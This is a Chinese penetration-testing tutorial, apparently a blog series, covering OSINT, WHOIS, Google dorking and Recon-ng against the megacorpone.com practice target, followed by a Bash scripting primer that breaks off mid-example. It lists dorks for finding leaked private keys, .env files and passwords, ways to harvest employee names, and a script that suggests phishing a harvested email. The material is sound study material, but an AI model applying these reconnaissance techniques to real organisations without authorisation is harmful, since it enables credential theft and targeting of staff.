- 网络嗅探：Wireshark、tcpdump（分析流量）。
- 暴力破解：Hydra（测试弱密码）、DirBuster（目录枚举）。
- 主动DNS查询：直接向目标DNS服务器请求记录。
适用场景：
- 渗透测试中后期，验证漏洞可利用性。
- 红队行动中模拟真实攻击行为。
- 需获得明确授权（如授权渗透测试）。

对比表格

特征	被动信息收集	主动信息收集
交互性	不直接与目标交互	直接与目标交互
隐蔽性	高（目标无法察觉）	低（可能触发告警）
数据来源	公开资源、第三方数据库	目标系统的响应数据
法律风险	低（需遵守隐私政策）	高（需明确授权）
常用工具	Shodan, WHOIS, Wayback Machine, Google	Nmap, Nessus, Hydra, Wireshark
渗透测试阶段	前期（侦查）	中后期（漏洞利用、横向移动）

实战建议

优先被动收集：在未授权时仅使用被动方法，避免法律风险。例如：通过GitHub搜索目标代码泄露。
主动收集需授权：在渗透测试中，主动扫描前必须获得书面授权。例如：使用Nmap扫描客户网络。
混合使用：结合两者提高效率。例如：被动收集子域名后，主动验证其存活性和服务版本。

开源情报（OSINT，Open Source Intelligence）是指从公开可获取的来源中收集、分析和利用信息，用于支持决策或安全分析。其核心特点是数据来源完全公开（如互联网、媒体、政府记录等），无需侵入目标系统，但需通过技术手段筛选有效信息。

什么是开源情报，如何获取开源情报？

开源情报（OSINT）的核心特点

公开性：数据来自免费或公开渠道（如网页、社交媒体、数据库）。
合法性：遵守隐私政策和法律法规（如 GDPR、CCPA）。
非侵入性：不直接与目标交互，避免触发安全告警。
多样性：覆盖文本、图像、视频、元数据等多种格式。
可验证性：通过交叉比对多个来源提高信息可信度。

如何获取开源情报？

1. 基础数据来源

搜索引擎：
- Google Dorking：使用高级语法（site:example.com filetype:pdf）挖掘敏感文件。
- Bing/Yandex：特定区域或语言的内容（如俄语信息用Yandex更高效）。
社交媒体：
- LinkedIn：挖掘员工职位、技术栈（如“某公司使用Apache Tomcat”）。
- Twitter/Telegram：追踪威胁情报（如勒索软件团伙的暗网活动）。
- GitHub/GitLab：搜索代码泄露、API密钥或硬编码密码。
域名与IP：
- WHOIS查询：获取域名注册人、邮箱、电话（工具：WhoisXML API）。
- DNS记录：通过 dig 或在线工具（ViewDNS）解析子域名和MX记录。
- 证书透明度日志（如crt.sh）：发现目标关联的SSL证书和子域名。

2. 高级技术工具

网络资产测绘：
- Shodan：搜索暴露的物联网设备（如摄像头、数据库）。
- Censys：分析IP的开放端口和服务指纹（如Apache版本）。
- FOFA：国内版Shodan，侧重中文目标。
元数据提取：
- ExifTool：从图片中提取GPS坐标、拍摄设备。
- FOCA：分析文档（PDF/Word）中的隐藏元数据。
历史数据：
- Wayback Machine：查看网站历史快照（如已删除的登录页面）。
- DNS历史记录：通过SecurityTrails追溯IP变更。

3. 自动化与框架

OSINT集成工具：
- Maltego：可视化关联分析（如域名→IP→员工邮箱→社交媒体）。
- SpiderFoot：自动聚合WHOIS、DNS、漏洞库等数据。
- theHarvester：批量收集邮箱、子域名（支持Google、Bing、PGP密钥服务器）。
自定义脚本：
- 使用Python（requests、BeautifulSoup）爬取特定网站数据。
- 调用API（如Twitter API、Shodan API）实现数据批量获取。

4. 暗网与威胁情报

暗网监控：
- 使用 Tor浏览器 访问暗网论坛（如Dread），搜索数据泄露记录。
- 工具：DarkSearch.io（暗网搜索引擎）。
漏洞与威胁库：
- CVE Details：查询已知漏洞的利用方式。
- VirusTotal：分析文件哈希、URL关联的恶意活动。
- AlienVault OTX：获取全球威胁情报指标（IOC）。

实战案例

定位数据泄露来源：
- 在GitHub搜索 companyname password，发现员工误传的配置文件含数据库密码。
- 通过Shodan验证该数据库IP是否暴露在公网。
钓鱼攻击溯源：
- 从钓鱼邮件元数据中提取发信IP，用AbuseIPDB查询历史恶意行为。
- 关联该IP的SSL证书，发现注册邮箱与某暗网论坛账号一致。
供应链攻击分析：
- 通过Crunchbase找到目标供应商的客户列表。
- 使用Censys扫描这些客户的公网资产，发现共用同一脆弱SaaS服务。

注意事项

法律合规：
- 避免侵犯隐私（如爬取LinkedIn个人资料可能违反用户协议）。
- 在欧盟地区需遵守GDPR（如模糊化处理个人信息）。
道德准则：
- 仅用于授权测试或防御分析，禁止恶意用途。
信息验证：
- 交叉验证多个来源（如WHOIS邮箱是否与社交媒体账号关联）。
- 警惕虚假信息（如伪造的GitHub仓库或域名注册信息）。

总结

开源情报（OSINT）是“从公开信息中提炼黄金”的技术，核心在于：

明确目标（如“获取某公司的网络拓扑”）。
选择工具链（如Maltego关联分析 + Shodan验证）。
自动化与人工分析结合，最终形成可行动的威胁情报。

Whois 信息收集

还是官方的靶机网址 https://www.megacorpone.com/

1whois megacorpone.com

强制指定 WHOIS 服务器（某些域名需指定注册商服务器）：

1whois -h whois.verisign-grs.com megacorpone.com

WHOIS 输出信息解析

1. 关键字段解读

字段	说明
Domain Name	域名名称（如 `example.com`）。
Registry Domain ID	域名在注册局的唯一标识符（用于追踪变更）。
Registrar	域名注册商（如 GoDaddy、Namecheap）。
Creation Date	域名注册日期（可用于判断目标运营时长）。
Expiration Date	域名过期时间（若未续费可能被抢注）。
Updated Date	最后更新时间（如DNS记录或所有者变更）。
Domain Status	域名状态（如 `clientTransferProhibited` 表示禁止转移）。
Name Server	域名使用的DNS服务器（可进一步探测子域名）。
Registrant Contact	注册人信息（可能被隐私保护服务隐藏）。
Admin/Technical Contact	管理员和技术联系人信息（可能包含邮箱、电话）。

2. 隐私保护的影响

Whois Privacy：

注册商提供隐私保护服务时，关键信息（如姓名、邮箱、电话）会被替换为代理信息：
```
1Registrant Name: REDACTED FOR PRIVACY
2Registrant Email: contact@privacyguard.example
```
此时需通过其他方式（如历史记录、关联域名）绕过隐私保护。

3. IP WHOIS 的额外信息

IP 范围：

1NetRange: 192.0.2.0 - 192.0.2.255 # IP地址段
2CIDR: 192.0.2.0/24 # 子网掩码
3Organization: Example ISP # 所属机构（可能是ISP或企业）

3. 自动化工具整合

与脚本结合：使用 Python 的python-whois库批量查询域名：

 1import whois
 2from datetime import datetime
 3
 4def get_domain_info(domain_name):
 5 try:
 6 domain = whois.whois(domain_name)
 7
 8 info = {
 9 "域名": domain_name,
10 "注册商": domain.registrar,
11 "创建日期": format_date(domain.creation_date),
12 "过期日期": format_date(domain.expiration_date),
13 "最后更新": format_date(domain.updated_date),
14 "状态": list_to_str(domain.status), # 状态可能是列表
15 "DNS服务器": list_to_str(domain.name_servers),
16 # 关键修复：处理字段为 None 的情况，统一转为 'N/A'
17 "注册人姓名": getattr(domain, 'name', 'N/A') or 'N/A',
18 "注册人邮箱": getattr(domain, 'email', 'N/A') or 'N/A',
19 "注册人电话": getattr(domain, 'phone', 'N/A') or 'N/A',
20 "注册机构": getattr(domain, 'org', 'N/A') or 'N/A',
21 "地址": getattr(domain, 'address', 'N/A') or 'N/A'
22 }
23 return info
24 except Exception as e:
25 return {"错误": str(e)}
26
27def format_date(date):
28 if isinstance(date, list):
29 return [d.strftime("%Y-%m-%d") if isinstance(d, datetime) else d for d in date]
30 elif isinstance(date, datetime):
31 return date.strftime("%Y-%m-%d")
32 return date or 'N/A' # 处理日期为 None 的情况
33
34def list_to_str(data):
35 if isinstance(data, list):
36 return ", ".join(str(item) for item in data)
37 return data or 'N/A' # 处理数据为 None 的情况
38
39if __name__ == "__main__":
40 target_domain = "megacorpone.com"
41 result = get_domain_info(target_domain)
42
43 print("\n[+] WHOIS 情报分析结果:")
44 print("-" * 50)
45 for key, value in result.items():
46 if key == "错误":
47 print(f" ! 查询失败: {value}")
48 else:
49 print(f" {key:>12} : {value}")
50
51 # 修复判断逻辑：先检查是否为 'N/A'
52 if result.get('注册人邮箱', 'N/A') != 'N/A':
53 print("\n[+] 潜在攻击面建议:")
54 print(f" - 对邮箱 {result['注册人邮箱']} 进行钓鱼或密码爆破测试")
55 if result.get('DNS服务器', 'N/A') != 'N/A':
56 print(f" - 扫描DNS服务器 {result['DNS服务器']} 的开放端口（如53 UDP/TCP）")

Google 信息收集

用法总集篇：https://www.exploit-db.com/google-hacking-database

1. 敏感文件与数据泄露

语法	用途
`site:megacorpone.com filetype:sql`	搜索目标域名的SQL数据库文件（可能含明文密码或数据表结构）。
`site:megacorpone.com "-----BEGIN RSA PRIVATE KEY-----"`	查找泄露的SSH私钥。
`site:megacorpone.com filetype:env OR filetype:ini`	查找 `.env`（环境变量）或 `.ini`（配置文件），常含API密钥、数据库密码。
`site:megacorpone.com ext:sql intext:password`	搜索含密码字段的SQL文件。
`site:megacorpone.com "api_key" OR "api_secret"`	查找硬编码的API密钥。

2. 后台与登录入口

语法	用途
`site:megacorpone.com intitle:"login" inurl:/admin`	查找管理员登录页面（如 `/admin/login.php`）。
`site:megacorpone.com inurl:/wp-admin`	定位WordPress后台（若未重命名）。
`site:megacorpone.com intitle:"index of /cgi-bin"`	发现CGI脚本目录（可能含未授权访问的脚本）。
`site:megacorpone.com inurl:debug`	查找调试页面（如 `debug.php`，可能暴露代码逻辑）。

3. 服务器与目录信息泄露

语法	用途
`intitle:"index of" site:megacorpone.com`	列出开放目录（可能暴露敏感文件）。
`site:megacorpone.com "Directory listing for"`	另一种目录列表泄露的关键词。
`site:megacorpone.com "Apache/2.4.29 (Ubuntu) Server at"`	根据服务器Banner信息定位特定版本的主机（可关联CVE漏洞）。
`site:megacorpone.com "X-Powered-By: PHP/7.2"`	查找运行指定PHP版本的服务器。

4. 备份文件与历史数据

语法	用途
`site:megacorpone.com filetype:bak`	搜索备份文件（如 `web.config.bak`、`database.sql.bak`）。
`site:megacorpone.com inurl:/backup`	查找备份目录（可能含数据库或代码备份）。
`site:megacorpone.com "backup.zip"`	直接定位压缩备份文件。
`site:megacorpone.com "This is a snapshot of"`	查找网站快照备份页面。

5. 漏洞与错误信息利用

语法	用途
`site:megacorpone.com “error”	“warning”`
`site:megacorpone.com "sql syntax near"`	定位SQL报错页面（可能存在SQL注入漏洞）。
`site:megacorpone.com "Stack trace:"`	查找Java/PHP堆栈跟踪信息（暴露代码逻辑）。
`site:megacorpone.com "PHP Fatal error"`	发现PHP致命错误页面。

6. 员工与内部信息收集

语法	用途
`site:linkedin.com employees megacorpone.com`	搜索LinkedIn上目标公司的员工信息。
`site:megacorpone.com "confidential" OR "internal"`	查找标有“内部”或“机密”的文件。
`site:github.com "megacorpone.com" password`	在GitHub中搜索目标相关代码中的密码泄露。
`site:megacorpone.com "@megacorpone.com" filetype:csv`	查找包含公司邮箱的CSV文件（可能为员工列表）。

7. 高级组合技巧

排除干扰： site:megacorpone.com -site:www.megacorpone.com（排除主站，专注子域名）。
通配符模糊搜索： site:megacorpone.com inurl:prod*env（匹配 prod.env、production.env 等）。
时间范围限定：在Google搜索工具中限定时间（如过去一年），找到最新泄露的数据。

课后练习

Exercises

Who is the VP of Legal for MegaCorp One and what is their email address?
Use Google dorks (either your own or any from the GHDB) to search www.megacorpone.com for interesting documents.
What other MegaCorp One employees can you identify that are not listed on www.megacorpone.com?

练习 1

问题：找到 MegaCorp One 的法律副总裁（VP of Legal）及其邮箱地址。

Google Hacking 解法：

LinkedIn 员工信息挖掘：
```
1site:linkedin.com/in "MegaCorp One" "VP Legal" 
```
- 搜索 LinkedIn 上职位为 “VP Legal” 且公司为 “MegaCorp One” 的用户。
  
  https://www.linkedin.com/in/mike-carlow-8128896a/
公司网站内部页面：
```
1site:megacorpone.com "leadership" OR "executive team" "legal" 
```
- 在公司官网的“领导团队”或“管理层”页面中查找法律相关职位。
文档泄露：
```
1site:megacorpone.com filetype:pdf "VP Legal" email 
```
- 搜索公司 PDF 文件中提及法律副总裁和邮箱的内容。

练习 2

问题：使用 Google 语法（或 GHDB 中的语法）搜索 www.megacorpone.com 的“有趣文档”。

Google Hacking 解法：

敏感文件搜索：
```
1site:megacorpone.com filetype:pdf OR filetype:doc OR filetype:xls 
```
- 查找所有 PDF、Word、Excel 文档（可能含财务报告、客户数据）。
配置与备份文件：
```
1site:megacorpone.com (ext:env OR ext:bak OR ext:sql) 
```
- 搜索环境变量文件、备份文件或 SQL 数据库文件。
后台与登录入口：
```
1site:megacorpone.com inurl:admin OR intitle:"login" 
```
- 查找管理员后台或登录页面。
目录遍历：
```
1site:megacorpone.com intitle:"index of" "parent directory" 
```
- 发现开放目录列表（可能泄露源码、图片等）。

练习 3

问题：找出未在 www.megacorpone.com 官网列出的其他员工。

Google Hacking 解法：

社交媒体与代码库：

site:github.com “megacorpone.com” “employee” OR “staff”


- 在 GitHub 代码中搜索员工信息（如注释中的邮箱、测试账号）。

 ![image-20250524223824273](https://newblogimg.oss-cn-beijing.aliyuncs.com/2025/image-20250524223824273.png)

2. **会议与演讲记录**：

```markdown
site:youtube.com OR site:slideshare.net "MegaCorp One" "speaker"

查找公司员工在外部会议或演讲中公开的姓名和职位。

新闻稿与合作伙伴：
```
1site:news.google.com "MegaCorp One" "announces" OR "partner" 
```
- 从新闻稿中挖掘未在官网列出的员工（如项目负责人）。
WHOIS 与域名关联：
```
1"MegaCorp One" site:whois.com 
```
- 通过 WHOIS 查询关联域名，获取注册人姓名和邮箱（可能为员工）。

泄露的通讯录：

1site:megacorpone.com filetype:csv "contact" OR "employee"

搜索泄露的 CSV 通讯录文件。

Netcraft 信息收集

网址：https://searchdns.netcraft.com/

Recon-ng 信息收集workspaces create my_workspace

1. 安装与启动

安装（Kali 默认已预装，若需更新）：
```
1sudo apt update && sudo apt install recon-ng
```
启动：
```
1recon-ng
```

2. 基本工作流程

初始化数据库

首次使用时需创建数据库：

1workspaces create my_workspace # 创建工作区
2workspaces load my_workspace # 加载工作区

查看模块

列出所有可用模块：

1marketplace search

筛选特定模块（如域名枚举）：

1marketplace search domain

加载模块

例如查看，下载，加载 whois_pocs 模块（通过 WHOIS 查找域名信息）：

1marketplace info recon/domains-hosts/google_site_web
2marketplace install recon/domains-hosts/google_site_web
3modules load recon/domains-contacts/whois_pocs
4back # 回到主界面

设置参数

指定目标域名（以 example.com 为例）：

1options set SOURCE megacorpone.com

执行模块

运行当前加载的模块：（用代理运行）

1run

查看结果

查看数据库中的收集结果：

1show hosts # 显示主机信息
2show contacts # 显示邮箱/联系人

3. 常用模块示例

域名信息收集

1modules load recon/domains-hosts/hackertarget
2options set SOURCE megacorpone.com
3run

邮箱枚举（需 API 密钥，如 Hunter.io）

1modules load recon/domains-contacts/hunter_io
2keys add hunter_api YOUR_API_KEY # 替换为实际 API 密钥
3options set SOURCE example.com
4run

子域名爆破（使用 bruteforce 字典）：

1modules load recon/domains-hosts/brute_hosts
2options set SOURCE megacorpone.com
3options set WORDLIST /usr/share/wordlists/subdomains-top1million.txt
4run

IP 关联主机发现（使用 Shodan）：

1modules load recon/domains-hosts/shodan_hostname
2keys add shodan_api YOUR_API_KEY # 替换为 Shodan API 密钥
3options set SOURCE 192.168.1.1 # 设置目标 IP
4run

4. 高级技巧

批量执行模块：使用 resource 命令批量运行脚本：

1resource /path/to/script.txt

脚本内容示例：

1modules load recon/domains-hosts/hackertarget
2options set SOURCE example.com
3run
4modules load recon/domains-contacts/whois_pocs
5run

导出数据：将结果导出为 CSV：

1show contacts export /home/kali/contacts.csv
2show hosts export /home/kali/hosts.csv

API 密钥管理：添加或查看已配置的 API 密钥：

1keys add shodan_api YOUR_KEY # 添加密钥
2keys list # 列出所有密钥

练习Exercise

(Reporting is not required for this exercise)

Use the recon/domains-hosts/google_site_web and recon/hosts-hosts/resolve modules to gather information on MegaCorp One.
Take some time to explore other recon-ng modules.
使用 recon/domains-hosts/google_site_web 和 recon/hosts-hosts/resolve 模块收集 MegaCorp One 的信息。
探索其他 Recon-ng 模块。

1. 启动 Recon-ng 并创建工作区

recon-ng # 启动工具
workspaces create megacorp_one # 创建名为 megacorp_one 的工作区
workspaces load megacorp_one # 加载工作区

2. 使用 google_site_web 模块发现子域名

# 加载模块
modules load recon/domains-hosts/google_site_web

# 设置目标域名（假设目标域名为 megacorpone.com）
options set SOURCE megacorpone.com

# 执行模块
run

作用：通过 Google 搜索语法 site:megacorpone.com 查找所有关联子域名（如 dev.megacorpone.com、api.megacorpone.com 等），并将结果保存到数据库。

3. 使用 resolve 模块解析主机名 IP

# 加载模块
modules load recon/hosts-hosts/resolve

# 自动从数据库读取上一步发现的子域名，无需手动设置 SOURCE

# 执行模块
run

作用：将发现的子域名解析为 IP 地址（例如 dev.megacorpone.com → 192.168.1.100），结果存储在 hosts 表中。

4. 查看收集结果

show hosts # 显示所有主机名及其解析的 IP

5. 探索其他常用模块

以下为扩展操作示例，帮助进一步信息收集：

子域名爆破（使用字典爆破）：

modules load recon/domains-hosts/brute_hosts
options set SOURCE megacorpone.com
options set WORDLIST /usr/share/wordlists/subdomains-top1million.txt
run

邮箱枚举（需 Hunter.io API 密钥）：

modules load recon/domains-contacts/hunter_io
keys add hunter_api YOUR_API_KEY # 替换为实际 API 密钥
options set SOURCE megacorpone.com
run

端口扫描（使用 Bing 搜索引擎发现开放端口）：

modules load recon/hosts-ports/bing_ip
options set SOURCE 192.168.1.100 # 替换为目标 IP
run

WHOIS 查询（获取域名注册信息）：

modules load recon/domains-contacts/whois_pocs
options set SOURCE megacorpone.com
run

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day14 Kali的Bash脚本

Fri, 16 May 2025 16:24:22 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Bash脚本基础

新建一个hello-world.sh文件，写入以下内容：

1#!/bin/bash
2#Hello world Bash Script
3echo "hello world!"

然后给脚本添加执行权限后运行

1chmod +x hello-world.sh 
2./hello-world.sh

变量

1s1=hello
2s2=world
3s3="I am Hacker"
4echo $s2 $s2 $s3

参数里面套命令，推荐用$()的用法，` 是过时的用法。

1user1=$(whoami) && user2=`whoami`
2echo $user1 $user2

参数

1$0 脚本文件名自己
2$1-$9 bash脚本的前九个参数
3$# 传递给bash脚本的参数数量
4$@ 传递给bash 脚本的所有参数
5$? 最近运行的程序的退出状态
6$USER 运行脚本的用户的用户名
7$HOSTNAME 计算机的主机名
8$RANDOM 生成一个随机数
9$LINENO 脚本中的当前行号

新建一个脚本写入如下内容。

1#!/bin/bash
2echo "The first two arguments are $1 and $2"

 1#!/bin/bash
 2# 文件名: demo_script.sh
 3# 功能: 演示常用 Bash 参数的用法
 4
 5# 1. 打印脚本名称
 6echo "脚本名称: $0"
 7
 8# 2. 打印前三个参数（若未传递参数则显示空）
 9echo "第一个参数: ${1:-未提供}"
10echo "第二个参数: ${2:-未提供}"
11echo "第三个参数: ${3:-未提供}"
12
13# 3. 打印总参数个数
14echo "参数总数: $#"
15
16# 4. 打印所有参数（带循环）
17echo "所有参数:"
18count=1
19for arg in "$@"; do
20echo " 参数$count: $arg"
21((count++))
22done
23
24# 5. 测试上一个命令的退出状态
25echo "生成随机数（测试退出状态）:"
26echo "随机数: $RANDOM"
27echo "生成随机数的退出状态: $? (0表示成功)"
28
29# 6. 故意执行一个失败的命令
30echo "执行一个失败的命令:"
31ls /non_existent_file
32echo "失败命令的退出状态: $? (非0表示失败)"
33
34# 7. 用户和主机信息
35echo "当前用户: $USER"
36echo "主机名: $HOSTNAME"
37
38# 8. 显示脚本当前行号（动态变化）
39echo "当前行号（执行前）: $LINENO"
40echo "当前行号（执行后）: $LINENO"
41
42# 9. 结束提示
43echo "脚本结束于行号: $LINENO"

Bash 特殊变量

变量名	作用	示例代码	输出示例（假设场景）
`$0`	当前脚本文件名	`echo "脚本名: $0"`	`脚本名: ./test.sh`
`$1`-`$9`	脚本的第1到第9个参数	`echo "参数1: $1"`	若执行 `./test.sh hi` → `参数1: hi`
`$#`	传递给脚本的参数个数	`echo "参数总数: $#"`	若执行 `./test.sh a b` → `参数总数: 2`
`$@`	所有参数，每个参数独立（推荐使用）	`for arg in "$@"; do echo "$arg"; done`	循环打印每个参数
`$*`	所有参数，合并为一个字符串	`echo "所有参数: $*"`	`所有参数: a b c`
`$?`	上一个命令的退出状态（0为成功）	`ls /tmp; echo "状态: $?"`	`状态: 0`（若目录存在）
`$$`	当前 Shell 进程的 PID	`echo "PID: $$"`	`PID: 12345`
`$!`	最后一个后台进程的 PID	`sleep 10 &; echo "后台PID: $!"`	`后台PID: 6789`
`$_`	上一个命令的最后一个参数	`ls /var; echo "$_"`	`/var`（假设 `ls` 命令的参数是 `/var`）
`$RANDOM`	生成一个 0-32767 的随机数	`echo "随机数: $RANDOM"`	`随机数: 18492`
`$LINENO`	当前脚本中的行号	`echo "当前行: $LINENO"`	`当前行: 15`
`$FUNCNAME`	当前函数名（数组，`${FUNCNAME[0]}`为当前函数）	`function test_fn { echo "函数名: ${FUNCNAME[0]}"; }; test_fn`	`函数名: test_fn`
`$SECONDS`	脚本已运行的秒数	`echo "运行时间: $SECONDS秒"`	`运行时间: 5秒`
`$PWD`	当前工作目录路径	`echo "当前目录: $PWD"`	`当前目录: /home/user`
`$OLDPWD`	上一个工作目录路径（`cd -`切换时会更新）	`echo "上一个目录: $OLDPWD"`	`上一个目录: /tmp`
`$IFS`	输入字段分隔符（默认是空格、制表符、换行）	`IFS=:; echo "拆分: $*"`	若参数为 `a:b:c` → `拆分: a b c`
`$BASH_VERSION`	Bash 版本信息	`echo "Bash版本: $BASH_VERSION"`	`Bash版本: 5.1.16(1)-release`
`$PPID`	父进程的 PID	`echo "父进程PID: $PPID"`	`父进程PID: 1234`
`$BASH_SOURCE`	当前脚本的路径（数组，`${BASH_SOURCE[0]}`为当前脚本）	`echo "脚本路径: ${BASH_SOURCE[0]}"`	`脚本路径: ./test.sh`

常用环境变量

变量名	作用	示例代码	输出示例
`$USER`	当前用户名	`echo "用户: $USER"`	`用户: ubuntu`
`$HOME`	当前用户的主目录路径	`echo "主目录: $HOME"`	`主目录: /home/user`
`$PATH`	可执行文件的搜索路径	`echo "PATH: $PATH"`	`PATH: /usr/bin:/bin`
`$SHELL`	当前 Shell 的路径	`echo "Shell: $SHELL"`	`Shell: /bin/bash`
`$LANG`	系统语言设置	`echo "语言: $LANG"`	`语言: en_US.UTF-8`
`$TERM`	终端类型	`echo "终端类型: $TERM"`	`终端类型: xterm-256color`
`$EDITOR`	默认文本编辑器	`echo "编辑器: $EDITOR"`	`编辑器: vim`
`$UID`	当前用户的 UID	`echo "UID: $UID"`	`UID: 1000`
`$GROUPS`	当前用户所属的组（数组）	`echo "组: ${GROUPS[@]}"`	`组: 1000 4 24`
`$HOSTNAME`	系统主机名	`echo "主机名: $HOSTNAME"`	`主机名: myserver`
`$OSTYPE`	操作系统类型	`echo "系统类型: $OSTYPE"`	`系统类型: linux-gnu`

用户输入

1#!/bin/bash
2echo "Hello there, would you like to learn how to hack: Y/N?"
3read answer # 把用户输入存到answer变量中
4echo "Your answer was $answer"

1#!/bin/bash
2# Prompt the user for credentials
3# Penetration Testing with Kali Linux 2.0
4# PWK 2.0 Copyright © Offensive Security Ltd. All rights reserved. 110
5read -p 'Username: ' username # 输出提示的同时将用户输入存入username变量
6read -sp 'Password: ' password # 输出提示的同时将用户输入存入password变量，且不显示，用于密码
7echo " "
8echo "Thanks, your creds are as follows: " $username " and " $password

判断

Bash 条件测试操作符详解

逻辑操作符

操作符	描述	示例
`! EXPRESSION`	对表达式取反（非）	`if ! [ -e file ]` → 文件不存在时条件为真

字符串比较

操作符	描述	示例
`-n STRING`	字符串长度大于零（非空）	`if [ -n "$name" ]` → 检查变量 `name` 是否非空
`-z STRING`	字符串长度为零（空）	`if [ -z "$error" ]` → 检查变量 `error` 是否为空
`STRING1 = STRING2`	字符串相等	`if [ "$os" = "Linux" ]` → 判断系统是否为 Linux
`STRING1 != STRING2`	字符串不相等	`if [ "$input" != "exit" ]` → 输入不是 “exit” 时条件为真

整数比较

操作符	描述	示例
`INT1 -eq INT2`	等于（Equal）	`if [ "$a" -eq 5 ]` → 判断 `a` 是否等于 5
`INT1 -ne INT2`	不等于（Not Equal）	`if [ "$retry" -ne 0 ]` → 重试次数不为 0
`INT1 -gt INT2`	大于（Greater Than）	`if [ "$score" -gt 60 ]` → 分数超过 60
`INT1 -lt INT2`	小于（Less Than）	`if [ "$age" -lt 18 ]` → 年龄小于 18
`INT1 -ge INT2`	大于等于（Greater or Equal）	`if [ "$count" -ge 10 ]` → 计数达到或超过 10
`INT1 -le INT2`	小于等于（Less or Equal）	`if [ "$time" -le 30 ]` → 时间小于等于 30 秒

文件测试

操作符	描述	示例
`-d FILE`	文件存在且是目录	`if [ -d "/tmp" ]` → 检查 `/tmp` 是否是目录
`-e FILE`	文件存在	`if [ -e "log.txt" ]` → 检查 `log.txt` 是否存在
`-r FILE`	文件存在且有读权限	`if [ -r "config.cfg" ]` → 检查配置文件是否可读
`-s FILE`	文件存在且非空	`if [ -s "data.csv" ]` → 检查数据文件是否有内容
`-w FILE`	文件存在且有写权限	`if [ -w "output.log" ]` → 检查日志文件是否可写
`-x FILE`	文件存在且有执行权限	`if [ -x "install.sh" ]` → 检查安装脚本是否有执行权限

新建一个文件**number_game.sh**

 1#!/bin/bash
 2# 生成随机数，用户猜测数字比大小
 3
 4# 生成1-100的随机数
 5target=$((RANDOM % 100 + 1))
 6attempts=0
 7max_attempts=10
 8
 9echo "欢迎来到猜数字游戏！"
10echo "我已生成一个1到100之间的整数，你有${max_attempts}次机会猜中它。"
11
12while [ $attempts -lt $max_attempts ]; do
13((attempts++))
14remaining=$((max_attempts - attempts + 1))
15echo -n "第${attempts}次猜测（剩余${remaining}次）："
16
17read guess
18
19# 检查输入是否为空或非数字
20if [ -z "$guess" ]; then
21 echo "错误：输入不能为空！"
22 ((attempts--))
23 continue
24elif ! [[ "$guess" =~ ^[0-9]+$ ]]; then
25 echo "错误：请输入数字！"
26 ((attempts--))
27 continue
28fi
29
30# 比较数字
31if [ "$guess" -eq "$target" ]; then
32 echo "恭喜！你在第${attempts}次猜中了正确答案：${target}！"
33 exit 0
34elif [ "$guess" -lt "$target" ]; then
35 echo "提示：你猜的数字太小了！"
36else
37 echo "提示：你猜的数字太大了！"
38fi
39done
40
41echo "很遗憾，你已经用完所有次数。正确答案是：${target}。"
42exit 1

循环

1. `for` 循环

基本语法

1for 变量 in 列表; do
2循环体
3done

应用场景

遍历已知序列（数字、文件、字符串等）。
执行固定次数的重复操作。

示例 1：遍历数字序列

终端输入cat > for1.sh，复制粘贴如下内容，回车后按ctrl D结束输入。就能不用打开vim直接输入脚本了。

 1#!/bin/bash
 2# 遍历 1-5 并打印平方数
 3for i in 1 2 3 4 5; do
 4echo "$i 的平方是 $((i*i))"
 5done
 6
 7# 使用序列生成器 {起..止..步长}
 8for i in {1..5}; do
 9echo "数字: $i"
10done
11
12# 指定步长（仅 Bash 4+ 支持）
13for i in {0..10..2}; do
14echo "偶数: $i"
15done

输出示例

示例 2：遍历文件

 1#!/bin/bash
 2# 遍历当前目录所有 .txt 文件并输出文件名
 3for file in *.txt; do
 4echo "find_${file}"
 5done
 6
 7# 遍历带空格的文件名（需设置 IFS）
 8IFS=$'\n' # 将字段分隔符设为换行符
 9for file in $(find . -name "*.log"); do
10echo "处理文件: $file"
11done

示例 3：遍历数组

1#!/bin/bash
2fruits=("苹果" "香蕉" "橘子")
3for fruit in "${fruits[@]}"; do
4echo "水果: $fruit"
5done

输出示例

2. `while` 循环

基本语法

1while 条件; do
2循环体
3done

应用场景

条件持续满足时循环（如读取文件、等待任务完成）。
无限循环（需搭配 break 或外部终止条件）。

示例 1：条件控制循环

1#!/bin/bash
2# 计数器从1累加到5
3count=1
4while [ $count -le 5 ]; do
5echo "计数: $count"
6((count++))
7done

输出示例

示例 2：读取文件内容**

1#!/bin/bash
2# 逐行读取文件
3while IFS= read -r line; do
4echo "行内容: $line"
5done < "w2.txt"

示例 3：无限循环 + 用户输入退出

 1#!/bin/bash
 2# 持续询问用户输入，直到输入 "exit"
 3while true; do
 4read -p "请输入命令（输入 exit 退出）: " cmd
 5if [ "$cmd" = "exit" ]; then
 6 break
 7else
 8 echo "执行命令: $cmd" && echo $($cmd)
 9fi
10done

3. `until` 循环（补充）

与 while 逻辑相反，当条件为假时执行循环。

1#!/bin/bash
2# 直到计数器大于5时停止
3count=1
4until [ $count -gt 5 ]; do
5echo "计数: $count"
6((count++))
7done

循环控制语句

命令	作用	示例
`break`	立即终止循环	`if [ $i -eq 3 ]; then break; fi`
`continue`	跳过当前循环，进入下一次	`if [ $i -eq 2 ]; then continue; fi`

选择循环的建议

已知迭代次数/列表 → for 循环 （如处理文件、数组、数字序列）
依赖动态条件 → while 循环 （如读取输入、监控进程状态）

综合应用脚本

 1#!/bin/bash
 2# 功能: 查找并压缩所有 .log 文件，直到总压缩文件超过 3 个
 3
 4log_count=0
 5while [ $log_count -lt 3 ]; do
 6# 查找未压缩的 .log 文件
 7for file in *.log; do
 8 if [ -f "$file" ]; then
 9 gzip "$file"
10 echo "已压缩: $file"
11 ((log_count++))
12 # 达到3个后退出循环
13 if [ $log_count -ge 3 ]; then
14 break 2 # 跳出外层 while 循环
15 fi
16 fi
17done
18sleep 1 # 等待新日志生成
19done
20echo "已压缩满3个文件！"

通过灵活组合 for 和 while，可以高效处理文件操作、系统监控等任务。

函数

在 Bash 脚本中，函数（Function）用于封装可重复使用的代码块，提升代码的可读性和复用性。以下是 Bash 函数的详细用法及示例：

1. 定义函数

语法

1# 方式1：使用 function 关键字
2function 函数名 {
3函数体
4}
5
6# 方式2：直接定义（兼容性更好）
7函数名() {
8函数体
9}

示例 1：简单函数

1# 定义一个打印欢迎信息的函数
2welcome() {
